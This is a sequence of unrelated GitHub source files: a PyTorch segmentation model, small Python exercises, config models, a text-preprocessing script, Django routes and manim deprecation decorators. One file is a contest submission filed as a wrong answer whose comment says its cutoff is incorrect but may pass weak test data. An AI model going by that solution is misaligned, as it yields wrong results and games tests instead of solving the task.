self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"SAVI\"]))\n if args.RVI:\n 
self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"RVI\"]))\n if args.DVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"DVI\"]))\n if args.VDVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"VDVI\"]))\n if args.GCC:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"GCC\"]))\n if args.EVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"EVI\"]))\n if args.VARI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"VARI\"]))\n\n if args.GAI: #pass min, max, clip...\n self.transforms.append(AppendGenericAgriculturalIndices(alphas = args.GAI))\n if args.learn:\n for init_channel in args.learn:\n if init_channel == \"gaussian\":\n self.transforms.append(AppendGenericAgriculturalIndices(learn=True))\n else:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[init_channel], learn=True))\n\n \n self.number_of_transforms = len(self.transforms)\n self.index_transform = nn.Sequential(*self.transforms)\n\n def forward(self, x):\n return self.index_transform(x)\n\n\n\n \n\ndef load_model(args, name='MSCG-Rx50', classes=7, node_size=(32,32)):\n if name == 'MSCG-Rx50':\n net = rx50_gcn_3head_4channel(args=args, out_channels=classes)\n elif name == 'MSCG-Rx101':\n net = rx101_gcn_3head_4channel(args=args, out_channels=classes)\n else:\n print('not found the net')\n return -1\n\n return net\n\n\nclass rx50_gcn_3head_4channel(nn.Module):\n def __init__(self, args, out_channels=7, pretrained=True,\n nodes=(32, 32), dropout=0,\n enhance_diag=True, aux_pred=True):\n super(rx50_gcn_3head_4channel, self).__init__() # same with res_fdcs_v5\n\n self.aux_pred = aux_pred\n self.node_size = nodes\n self.num_cluster = out_channels\n\n resnet = se_resnext50_32x4d()\n\n self.index_transforms_layer = IndexTransforms(args)\n self.layer0, self.layer1, self.layer2, self.layer3, = \\\n resnet.layer0, resnet.layer1, resnet.layer2, resnet.layer3\n\n conv_in_channels = 4 + self.index_transforms_layer.number_of_transforms\n\n self.conv0 = torch.nn.Conv2d(conv_in_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n\n for child in self.layer0.children():\n for param in child.parameters():\n par = param\n break\n break\n\n self.conv0.parameters = torch.cat([par[:, 0, :, :].unsqueeze(1), par], 1)\n self.layer0 = torch.nn.Sequential(self.conv0, *list(self.layer0)[1:4])\n\n self.graph_layers1 = GCN_Layer(1024, 128, bnorm=True, activation=nn.ReLU(True), dropout=dropout)\n\n self.graph_layers2 = GCN_Layer(128, out_channels, bnorm=False, activation=None)\n\n self.scg = SCG_block(in_ch=1024,\n hidden_ch=out_channels,\n node_size=nodes,\n add_diag=enhance_diag,\n dropout=dropout)\n\n weight_xavier_init(self.graph_layers1, self.graph_layers2, self.scg)\n\n def forward(self, x):\n # add prepocess channels\n\n x = self.index_transforms_layer(x)\n \n\n x_size = x.size()\n # for i, param in enumerate(self.layer0.parameters()):\n # print(f\"conv Parameter #{i} of shape {param.shape}:\\n{param.data}\\n\")\n\n gx = self.layer3(self.layer2(self.layer1(self.layer0(x))))\n gx90 = gx.permute(0, 1, 3, 2)\n gx180 = gx.flip(3)\n B, C, H, W = gx.size()\n\n A, gx, loss, z_hat = self.scg(gx)\n gx, _ = self.graph_layers2(\n self.graph_layers1((gx.reshape(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx += z_hat\n gx = gx.reshape(B, self.num_cluster, self.node_size[0], self.node_size[1])\n\n A, gx90, loss2, z_hat = self.scg(gx90)\n 
gx90, _ = self.graph_layers2(\n self.graph_layers1((gx90.reshape(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx90 += z_hat\n gx90 = gx90.reshape(B, self.num_cluster, self.node_size[1], self.node_size[0])\n gx90 = gx90.permute(0, 1, 3, 2)\n gx += gx90\n\n A, gx180, loss3, z_hat = self.scg(gx180)\n gx180, _ = self.graph_layers2(\n self.graph_layers1((gx180.reshape(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx180 += z_hat\n gx180 = gx180.reshape(B, self.num_cluster, self.node_size[0], self.node_size[1])\n gx180 = gx180.flip(3)\n gx += gx180\n\n gx = F.interpolate(gx, (H, W), mode='bilinear', align_corners=False)\n\n if self.training:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False), loss + loss2 + loss3\n else:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False)\n\n\nclass rx101_gcn_3head_4channel(nn.Module):\n def __init__(self, args, out_channels=7, pretrained=True,\n nodes=(32, 32), dropout=0,\n enhance_diag=True, aux_pred=True):\n super(rx101_gcn_3head_4channel, self).__init__() # same with res_fdcs_v5\n\n self.aux_pred = aux_pred\n self.node_size = nodes\n self.num_cluster = out_channels\n\n resnet = se_resnext101_32x4d()\n self.index_transforms_layer = IndexTransforms(args)\n self.layer0, self.layer1, self.layer2, self.layer3, = \\\n resnet.layer0, resnet.layer1, resnet.layer2, resnet.layer3\n\n conv_in_channels = 4 + self.index_transforms_layer.number_of_transforms\n\n self.conv0 = torch.nn.Conv2d(conv_in_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n\n for child in self.layer0.children():\n for param in child.parameters():\n par = param\n break\n break\n\n self.conv0.parameters = torch.cat([par[:, 0, :, :].unsqueeze(1), par], 1)\n self.layer0 = torch.nn.Sequential(self.conv0, *list(self.layer0)[1:4])\n\n self.graph_layers1 = GCN_Layer(1024, 128, bnorm=True, activation=nn.ReLU(True), dropout=dropout)\n\n self.graph_layers2 = GCN_Layer(128, out_channels, bnorm=False, activation=None)\n\n self.scg = SCG_block(in_ch=1024,\n hidden_ch=out_channels,\n node_size=nodes,\n add_diag=enhance_diag,\n dropout=dropout)\n\n weight_xavier_init(self.graph_layers1, self.graph_layers2, self.scg)\n\n def forward(self, x):\n x = self.index_transforms_layer(x)\n x_size = x.size()\n\n gx = self.layer3(self.layer2(self.layer1(self.layer0(x))))\n gx90 = gx.permute(0, 1, 3, 2)\n gx180 = gx.flip(3)\n\n B, C, H, W = gx.size()\n\n A, gx, loss, z_hat = self.scg(gx)\n\n gx, _ = self.graph_layers2(\n self.graph_layers1((gx.view(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx += z_hat\n gx = gx.view(B, self.num_cluster, self.node_size[0], self.node_size[1])\n\n A, gx90, loss2, z_hat = self.scg(gx90)\n gx90, _ = self.graph_layers2(\n self.graph_layers1((gx90.view(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx90 += z_hat\n gx90 = gx90.view(B, self.num_cluster, self.node_size[1], self.node_size[0])\n gx90 = gx90.permute(0, 1, 3, 2)\n gx += gx90\n\n A, gx180, loss3, z_hat = self.scg(gx180)\n gx180, _ = self.graph_layers2(\n self.graph_layers1((gx180.view(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx180 += z_hat\n gx180 = gx180.view(B, self.num_cluster, self.node_size[0], self.node_size[1])\n gx180 = gx180.flip(3)\n gx += gx180\n\n gx = F.interpolate(gx, (H, W), mode='bilinear', align_corners=False)\n\n if self.training:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False), loss + loss2 + loss3\n else:\n return 
F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False)\n","repo_name":"ronbenc/Agrivision-project","sub_path":"src_Mor_Ron/MSCG-Net-master/tools/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"71469451188","text":"from operator import add, sub\n\n\nclass Vector:\n    def __init__(self, *coords):\n        self.coords = coords\n\n    def __valid(self, other):\n        if len(self.coords) != len(other.coords):\n            raise TypeError('vector dimensions do not match')\n\n    def __add__(self, other):\n        self.__valid(other)\n        return Vector(*(map(add, self.coords, other.coords)))\n\n    def __sub__(self, other):\n        self.__valid(other)\n        return Vector(*(map(sub, self.coords, other.coords)))\n\n    def get_coords(self):\n        return self.coords\n\n\nclass VectorInt(Vector):\n    def __init__(self, *coords):\n        if len(tuple(filter(lambda x: isinstance(x, int), coords))) != len(coords):\n            raise ValueError('coordinates must be integers')\n        super().__init__(*coords)\n\n    # def __add__(self, other):\n    #     _class = Vector if not isinstance(other, type(self)) else type(self)\n    #     return _class(*tuple(map(add, self.coords, other.coords)))\n\n    def __add__(self, other):\n        if not isinstance(other, type(self)):\n            return super().__add__(other)\n        return __class__(*tuple(map(add, self.coords, other.coords)))\n\n    # def __sub__(self, other):\n    #     _class = Vector if not isinstance(other, type(self)) else type(self)\n    #     return _class(*tuple(map(sub, self.coords, other.coords)))\n\n    def __sub__(self, other):\n        if not isinstance(other, type(self)):\n            return super().__sub__(other)\n        return __class__(*tuple(map(sub, self.coords, other.coords)))\n\n\n# Test:\nv1 = Vector(1, 2, 3)\nv2 = Vector(3, 4, 5)\n# print((v1 + v2).get_coords())\nassert (v1 + v2).get_coords() == (\n    4, 6, 8), \"the addition operation produced wrong values (or the get_coords method is broken)\"\nassert (v1 - v2).get_coords() == (\n    -2, -2, -2), \"the subtraction operation produced wrong values (or the get_coords method is broken)\"\n\nv = VectorInt(1, 2, 3, 4)\nassert isinstance(v, Vector), \"class VectorInt must inherit from class Vector\"\n\ntry:\n    v = VectorInt(1, 2, 3.4, 4)\nexcept ValueError:\n    assert True\nelse:\n    assert False, \"ValueError was not raised for the command v = VectorInt(1, 2, 3.4, 4)\"\n\nv1 = VectorInt(1, 2, 3, 4)\nv2 = VectorInt(4, 2, 3, 4)\nv3 = Vector(1.0, 2, 3, 4)\n\nv = v1 + v2\nassert type(\n    v) == VectorInt, \"adding vectors with integer coordinates must produce a VectorInt object\"\nv = v1 + v3\nassert type(v) == Vector, \"adding a vector with real-valued coordinates must produce a Vector object\"\n","repo_name":"albert2126/StepikOOP","sub_path":"Part04/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"30409594412","text":"from pytest import mark\n\n\nclass Solution:\n    def min_remove_to_make_valid_parentheses(self, s: str) -> str:\n        remove = []\n        stack = []\n        for i in range(len(s)):\n            if s[i] == \"(\":\n                stack.append(i)\n            elif s[i] == \")\":\n                if not stack:\n                    remove.append(i)\n                else:\n                    stack.pop()\n        remove.extend(stack)\n\n        for j in range(len(remove)):\n            s = s[: remove[j] - j] + s[remove[j] - j + 1 :]\n\n        return s\n\n\nclass TestSolution:\n    data_provider = [\n        [\"((a)))\", \"((a))\"],\n        [\"))((\", \"\"],\n        
[\"(()a(()\", \"()a()\"],\n    ]\n\n    @mark.parametrize(\"s, expected\", data_provider)\n    def test_min_remove_to_make_valid_parentheses(self, s: str, expected: str):\n        solution = Solution()\n        assert solution.min_remove_to_make_valid_parentheses(s) == expected\n","repo_name":"Ariel-Yu/leetcode-pratices-and-tests","sub_path":"stack/test_1249_minimum_remove_to_make_valid_parentheses.py","file_name":"test_1249_minimum_remove_to_make_valid_parentheses.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"16715476969","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom q36 import count_words\nsns.set(font='AppleGothic')\n\nlabel, y = [], []\nfor word, i in count_words.most_common(10):\n    label.append(word)\n    y.append(i)\nx = [i for i in range(10)]\nplt.bar(x, y, tick_label=label, align=\"center\")\nplt.ylabel(\"frequency\", fontsize=20)\nplt.show()","repo_name":"kuribayashi4/100knock","sub_path":"chapter04/q37.py","file_name":"q37.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"43658307092","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 10:50:53 2018\n\n@author: 123\n\"\"\"\n\nimport sys\nfrom PyQt5 import QtGui, QtWidgets\n\ndef show_image(image_path='spyder.png'):\n    app = QtWidgets.QApplication(sys.argv)\n    pixmap = QtGui.QPixmap(image_path)\n    screen = QtWidgets.QLabel() # The QLabel widget provides a text or image display. \n    screen.setPixmap(pixmap)\n    screen.showFullScreen()\n    # sys.exit() raises a SystemExit exception; if the exception is not caught, the Python interpreter exits. Any code that catches the exception will still run.\n    sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n    show_image()","repo_name":"seed-fe/face_recognition_using_opencv_keras_scikit-learn","sub_path":"show_image.py","file_name":"show_image.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"94"}
+{"seq_id":"72375679349","text":"\"\"\"\nPydantic models for configuring AFEP.\n\"\"\"\nfrom pathlib import Path\n\nfrom pydantic import BaseModel\n\n\nclass AfepRun(BaseModel):\n    note_directories: list[Path] = None\n    mml_format: str = None  # default to json if not specified by MultiAfepConfig\n    outdir: Path = None  # should be assigned by parent; to alter name, use 'name'\n    expand_cuis: bool = False\n    apikey: str = None\n    skip_greedy_algorithm: bool = False\n    min_kb: int = None  # default to ceiling(n_articles/2)\n    max_kb: int = None\n    data_directory: list[Path] = None\n    name: str = None  # for naming output directory\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        # post init\n        if not self.name:\n            self.name = self.data_directory[0].stem\n\n    def set_outdir(self, default: Path):\n        self.outdir = self.get_outdir(default)\n\n    def set_note_directories(self, default: list[Path]):\n        if not self.note_directories:\n            self.note_directories = default\n\n    def set_mml_format(self, default: str):\n        if not self.mml_format:\n            if default:\n                self.mml_format = default\n            else:  # default to json if not otherwise specified\n                self.mml_format = 'json'\n\n    def get_outdir(self, default: Path):\n        name = f'{self.name if self.name else self.note_directories[0].stem}' \\\n               f'-selected{\"-cui-exp\" if self.expand_cuis else \"\"}'\n        if default is None:\n            return Path('.') / name\n        elif self.name:\n            return default / f'{self.name}-selected{\"-cui-exp\" if self.expand_cuis else \"\"}'\n        
else:\n            return default / f'{self.note_directories[0].stem}-selected{\"-cui-exp\" if self.expand_cuis else \"\"}'\n\n    def is_valid(self):\n        assert self.note_directories is not None\n\n\nclass MultiAfepConfig(BaseModel):\n    runs: list[AfepRun]\n    outdir: Path = None  # general output directory\n    build_summary: bool = True\n    base_directory: Path = None\n    note_directories: list[Path] = None\n    mml_format: str = None\n    apikey: str = None\n    expand_cuis: bool = False\n    min_kb: int = None\n    max_kb: int = None\n\n    def __init__(self, **kw):\n        super().__init__(**kw)\n        # post init\n        for run in self.runs:\n            run.set_outdir(self.outdir)\n            run.set_note_directories(self.note_directories)\n            run.set_mml_format(self.mml_format)\n            if self.expand_cuis or run.expand_cuis:\n                run.apikey = self.apikey\n                run.expand_cuis = True\n            if self.min_kb and run.min_kb is None:\n                run.min_kb = self.min_kb\n            if self.max_kb and run.max_kb is None:\n                run.max_kb = self.max_kb\n            run.is_valid()\n","repo_name":"kpwhri/mml_utils","sub_path":"src/mml_utils/config/run_afep.py","file_name":"run_afep.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"34017602651","text":"# -*- coding: utf-8 -*-\nimport logging\nimport multiprocessing\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\nstopword = []\n\ndef get_stopword():\n\tglobal stopword\n\tread_stopword = open('stopword.txt', 'r')\n\twhile True:\n\t\tstr = read_stopword.readline()\n\t\tif str == '' :\n\t\t\tbreak\n\t\tstr = str.split('\\n')[0]\n\t\tstopword.append(str)\n\t\t\ndef LDA_format(fin, fout, num):\n\tfout.write(num.__str__() + '\\n')\n\twhile True:\n\t\tstr = fin.readline()\n\t\tif str == '':\n\t\t\tbreak\n\t\tfout.write(str)\n\t\ndef remove_note(str):\n\tcount = -1\n\tdot = False\n\twhile (count < len(str)-1):\n\t\tcount = count + 1\n\t\tif (ord(str[count]) >=97 and ord(str[count]) <= 122):\n\t\t\tcontinue\n\t\telif ord(str[count]) == 46:\n\t\t\tif not dot:\n\t\t\t\tstr = str.replace(str[count], ' . 
')\n\t\t\t\tdot = True\n\t\t\tcontinue\n\t\telif (ord(str[count]) == 39 and ord(str[count-1]) >= 97 and ord(str[count-1]) <= 122 ):\n\t\t\tif count == len(str)-1:\n\t\t\t\tcontinue\n\t\t\telif (ord(str[count]) == 39 and ord(str[count+1]) >= 97 and ord(str[count+1]) <= 122 ):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tstr = str.replace(str[count], ' ')\n\t\telse:\n\t\t\tstr = str.replace(str[count], ' ')\n\treturn str\n\ndef main():\n\topen_attraction_file=open('Attractions_eng2.txt','r')\n\twhile True:\n\t\tattraction_url = open_attraction_file.readline()\n\t\tif attraction_url == '':\n\t\t\tbreak\n\t\tcity = attraction_url.split('-')[3].split('.')[0]\n\t\tf = open('eng_data/' + city + '/eng_property_title_and_link.txt', 'r')\n\t\twhile True:\n\t\t\ttitle = f.readline() # title\n\t\t\tif title == '':\n\t\t\t\tbreak\n\t\t\ttitle = title.split('\\n')[0]\n\t\t\ttry:\n\t\t\t\topen_comment = open('eng_data/'+ city + '/' + title + '/' + title + '_all.txt', 'r')\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\twrite_preprocess = open('eng_data/'+ city + '/' + title + '/' + title + '_preprocess.txt', 'w')\n\t\t\tdocument_count = 0\n\t\t\twhile True:\n\t\t\t\tstr = open_comment.readline()\n\t\t\t\tif str == '':\n\t\t\t\t\tbreak\n\t\t\t\tstr = str.lower() # convert to lowercase\n\t\t\t\tstr = str.split('\\n')[0]\n\t\t\t\tstr = remove_note(str) # strip punctuation\n\t\t\t\ttemp = str.split(' ') # split on spaces, then rebuild\n\t\t\t\t# remove stopwords\n\t\t\t\tfor item in stopword:\n\t\t\t\t\tfor word in temp:\n\t\t\t\t\t\tif word == item:\n\t\t\t\t\t\t\ttemp.remove(word)\n\t\t\t\t# write out to the preprocess file\n\t\t\t\tcheck_space = False\n\t\t\t\tfor word in temp:\n\t\t\t\t\tif word != '':\n\t\t\t\t\t\tif not check_space:\n\t\t\t\t\t\t\tcheck_space = True\n\t\t\t\t\t\t\twrite_preprocess.write(word)\n\t\t\t\t\t\telif word == '.':\n\t\t\t\t\t\t\twrite_preprocess.write('.')\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\twrite_preprocess.write(' ' + word)\n\t\t\t\twrite_preprocess.write('\\n')\n\t\t\t\tdocument_count = document_count + 1\n\t\t\tf.readline() # link\n\t\t\twrite_preprocess.close()\n\t\t\t# prepend the document count\n\t\t\twrite_for_LDA = open('eng_data/' + city + '/' + title + '/' + title + '_LDA.txt', 'w')\n\t\t\topen_preprocess = open('eng_data/' + city + '/' + title + '/' + title + '_preprocess.txt', 'r')\n\t\t\tLDA_format(open_preprocess, write_for_LDA, document_count)\n\t\t\twrite_for_LDA.close()\n\t\t\topen_preprocess.close()\n\t\nif __name__ == '__main__':\n\tFORMAT = '%(asctime)s %(lineno)04d %(levelname)05s %(message)s'\n\tlogging.basicConfig(level=logging.DEBUG, filename='preprocess.log', format = FORMAT)\n\tget_stopword()\n\tmain()\n\t\n","repo_name":"a5135324/Crawler","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"31236153330","text":"def fatorial(n):\n    \"\"\"compute the factorial of a number\"\"\"\n    fat = 1\n    while n > 1:\n        fat *= n\n        n -= 1\n    return fat\n\n\ndef epsilon(x):\n    eps = 1.0 + x\n    i = 2\n    aprox = True\n    while aprox:\n        termo = (x ** i) / fatorial(i)\n        eps += termo\n        aprox = not abs(termo) < (x / 100)\n        i += 1\n    return eps\n\n\ndef get_exp(n):\n    return 2.718281828459045 ** n\n\n\ndef main():\n    for j in range(10):\n        print(epsilon(float(j+1)), get_exp(j + 1))\n\n\nif __name__ == \"__main__\":\n    
main()\n","repo_name":"Joaquim1302/usp-python","sub_path":"src/parte02/semana02/exerc_14_2_epsilon.py","file_name":"exerc_14_2_epsilon.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"42652830745","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 12:24:19 2019\n\n@author: angelo\n\"\"\"\n\nfrom images import load, save\nfrom point import Rectangle, Square, Point\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\namazon = (59, 122, 87)\n\n\nclass Image:\n    \"\"\"The image class\"\"\"\n\n    def __init__(self, height=640, length=480, background_color=white):\n        self.imm = [[background_color] * length for _ in range(height)]\n        self.length = length\n        self.height = height\n        self.background_color = background_color\n\n    def __str__(self):\n        return \"Image (h = {}, l = {}, background = {})\".format(\n            self.height, self.length, self.background_color\n        )\n\n    def __repr__(self):\n        return self.__str__()\n\n    def draw_rectangle(self, rectangle, color):\n        if not isinstance(rectangle, (Rectangle, Square)):\n            raise TypeError(\"draw_rectangle only draws rectangles\")\n        for y in range(rectangle.vertice_as.y, rectangle.vertice_bs.y + 1):\n            for x in range(rectangle.vertice_as.x, rectangle.vertice_ad.x + 1):\n                self.imm[y][x] = color\n\n    def sava(self, nome_file):\n        if type(nome_file) != str or not nome_file.endswith(\".png\"):\n            raise TypeError(\"I can only save to .png files\")\n        save(self.imm, nome_file)\n\n    def __add__(self, r):\n        self.draw_rectangle(r, black)\n","repo_name":"edoardottt/programming-fundamentals","sub_path":"programming_lab/lab271119/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"94"}
+{"seq_id":"17814877147","text":"#!/usr/bin/env python3\nfrom heapq import heappush, heappop\n\nN, M, K, A, B = [int(x) for x in input().split()]\ngraph = [[] for _ in range(N)]\nfor i in range(M):\n    a,b,c = [int(x) for x in input().split()]\n    graph[a].append((c,b))\n\ndist = [1e18]*N\npq = [(0,A)]\ndist[A] = 0\nnimprov = [0]*N\nnegative_cycle = False\nwhile len(pq) > 0:\n    d,i = heappop(pq)\n    nimprov[i] += 1\n    # Some extra for good measure; this is incorrect but might get through bad test data\n    if nimprov[i] > 2*K+3:\n        # In case of both having a negative cycle AND unreachable B,\n        # unreachability takes precedence\n        negative_cycle = True\n        continue\n    for c,j in graph[i]:\n        if d+c >= dist[j]:\n            continue\n        dist[j] = d+c\n        heappush(pq, (d+c, j))\nif dist[B] == 1e18:\n    print(\"POSITIVE INFINITY\")\nelif negative_cycle:\n    print(\"NEGATIVE INFINITY\")\nelse:\n    print(dist[B])\n","repo_name":"ChalmersCodingClub/chalmerschallenge23-public","sub_path":"problems/negativegraph/submissions/wrong_answer/loke_superdijkstra.py","file_name":"loke_superdijkstra.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"24527239523","text":"from django.urls import path\r\nfrom . 
import views\r\n\r\n\r\nurlpatterns = [\r\n    path('', views.index, name='index'),\r\n    path('about/', views.about, name='about'),\r\n    path('shop/', views.shop, name='shop'),\r\n    path('contact/', views.contact, name='contact'),\r\n    path('service/', views.service, name='service'),\r\n    path('howtobuy/', views.howtobuy, name='howtobuy'),\r\n    path('products/', views.products, name='products'),\r\n    \r\n]","repo_name":"Saleemkk/ShoeShipping","sub_path":"shipping/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"9081117036","text":"\"\"\"Decorators for deprecating classes, functions and function parameters.\"\"\"\n\nfrom __future__ import annotations\n\n__all__ = [\"deprecated\", \"deprecated_params\"]\n\n\nimport inspect\nimport re\nfrom typing import Any, Callable, Iterable\n\nfrom decorator import decorate, decorator\n\nfrom .. import logger\n\n\ndef _get_callable_info(callable: Callable) -> tuple[str, str]:\n    \"\"\"Returns type and name of a callable.\n\n    Parameters\n    ----------\n    callable\n        The callable\n\n    Returns\n    -------\n    Tuple[str, str]\n        The type and name of the callable. Type can be one of \"class\", \"method\" (for\n        functions defined in classes) or \"function\". For methods, name is Class.method.\n    \"\"\"\n    what = type(callable).__name__\n    name = callable.__qualname__\n    if what == \"function\" and \".\" in name:\n        what = \"method\"\n    elif what != \"function\":\n        what = \"class\"\n    return (what, name)\n\n\ndef _deprecation_text_component(\n    since: str | None,\n    until: str | None,\n    message: str,\n) -> str:\n    \"\"\"Generates a text component used in deprecation messages.\n\n    Parameters\n    ----------\n    since\n        The version or date since deprecation\n    until\n        The version or date until removal of the deprecated callable\n    message\n        The reason for why the callable has been deprecated\n\n    Returns\n    -------\n    str\n        The deprecation message text component.\n    \"\"\"\n    since = f\"since {since} \" if since else \"\"\n    until = (\n        f\"is expected to be removed after {until}\"\n        if until\n        else \"may be removed in a later version\"\n    )\n    msg = \" \" + message if message else \"\"\n    return f\"deprecated {since}and {until}.{msg}\"\n\n\ndef deprecated(\n    func: Callable = None,\n    since: str | None = None,\n    until: str | None = None,\n    replacement: str | None = None,\n    message: str | None = \"\",\n) -> Callable:\n    \"\"\"Decorator to mark a callable as deprecated.\n\n    The decorated callable will cause a warning when used. The docstring of the\n    deprecated callable is adjusted to indicate that this callable is deprecated.\n\n    Parameters\n    ----------\n    func\n        The function to be decorated. 
Should not be set by the user.\n    since\n        The version or date since deprecation.\n    until\n        The version or date until removal of the deprecated callable.\n    replacement\n        The identifier of the callable replacing the deprecated one.\n    message\n        The reason for why the callable has been deprecated.\n\n    Returns\n    -------\n    Callable\n        The decorated callable.\n\n    Examples\n    --------\n    Basic usage::\n\n        from manim.utils.deprecation import deprecated\n\n        @deprecated\n        def foo(**kwargs):\n            pass\n\n        @deprecated\n        class Bar:\n            def __init__(self):\n                pass\n\n            @deprecated\n            def baz(self):\n                pass\n\n        foo()\n        # WARNING The function foo has been deprecated and may be removed in a later version.\n\n        a = Bar()\n        # WARNING The class Bar has been deprecated and may be removed in a later version.\n\n        a.baz()\n        # WARNING The method Bar.baz has been deprecated and may be removed in a later version.\n\n    You can specify additional information for a more precise warning::\n\n        from manim.utils.deprecation import deprecated\n\n        @deprecated(\n            since=\"v0.2\",\n            until=\"v0.4\",\n            replacement=\"bar\",\n            message=\"It is cooler.\"\n        )\n        def foo():\n            pass\n\n        foo()\n        # WARNING The function foo has been deprecated since v0.2 and is expected to be removed after v0.4. Use bar instead. It is cooler.\n\n    You may also use dates instead of versions::\n\n        from manim.utils.deprecation import deprecated\n\n        @deprecated(since=\"05/01/2021\", until=\"06/01/2021\")\n        def foo():\n            pass\n\n        foo()\n        # WARNING The function foo has been deprecated since 05/01/2021 and is expected to be removed after 06/01/2021.\n\n    \"\"\"\n    # If used as factory:\n    if func is None:\n        return lambda func: deprecated(func, since, until, replacement, message)\n\n    what, name = _get_callable_info(func)\n\n    def warning_msg(for_docs: bool = False) -> str:\n        \"\"\"Generate the deprecation warning message.\n\n        Parameters\n        ----------\n        for_docs\n            Whether or not to format the message for use in documentation.\n\n        Returns\n        -------\n        str\n            The deprecation message.\n        \"\"\"\n        msg = message\n        if replacement is not None:\n            repl = replacement\n            if for_docs:\n                mapper = {\"class\": \"class\", \"method\": \"meth\", \"function\": \"func\"}\n                repl = f\":{mapper[what]}:`~.{replacement}`\"\n            msg = f\"Use {repl} instead.{' ' + message if message else ''}\"\n        deprecated = _deprecation_text_component(since, until, msg)\n        return f\"The {what} {name} has been {deprecated}\"\n\n    def deprecate_docs(func: Callable):\n        \"\"\"Adjust docstring to indicate the deprecation.\n\n        Parameters\n        ----------\n        func\n            The callable whose docstring to adjust.\n        \"\"\"\n        warning = warning_msg(True)\n        doc_string = func.__doc__ or \"\"\n        func.__doc__ = f\"{doc_string}\\n\\n.. 
attention:: Deprecated\\n    {warning}\"\n\n    def deprecate(func: Callable, *args, **kwargs):\n        \"\"\"The actual decorator used to extend the callable's behavior.\n\n        Logs a warning message.\n\n        Parameters\n        ----------\n        func\n            The callable to decorate.\n        args\n            The arguments passed to the given callable.\n        kwargs\n            The keyword arguments passed to the given callable.\n\n        Returns\n        -------\n        Any\n            The return value of the given callable when being passed the given\n            arguments.\n        \"\"\"\n        logger.warning(warning_msg())\n        return func(*args, **kwargs)\n\n    if type(func).__name__ != \"function\":\n        deprecate_docs(func)\n        func.__init__ = decorate(func.__init__, deprecate)\n        return func\n\n    func = decorate(func, deprecate)\n    deprecate_docs(func)\n    return func\n\n\ndef deprecated_params(\n    params: str | Iterable[str] | None = None,\n    since: str | None = None,\n    until: str | None = None,\n    message: str | None = \"\",\n    redirections: None\n    | (Iterable[tuple[str, str] | Callable[..., dict[str, Any]]]) = None,\n) -> Callable:\n    \"\"\"Decorator to mark parameters of a callable as deprecated.\n\n    It can also be used to automatically redirect deprecated parameter values to their\n    replacements.\n\n    Parameters\n    ----------\n    params\n        The parameters to be deprecated. Can consist of:\n\n        * An iterable of strings, with each element representing a parameter to deprecate\n        * A single string, with parameter names separated by commas or spaces.\n    since\n        The version or date since deprecation.\n    until\n        The version or date until removal of the deprecated callable.\n    message\n        The reason for why the callable has been deprecated.\n    redirections\n        A list of parameter redirections. Each redirection can be one of the following:\n\n        * A tuple of two strings. The first string defines the name of the deprecated\n          parameter; the second string defines the name of the 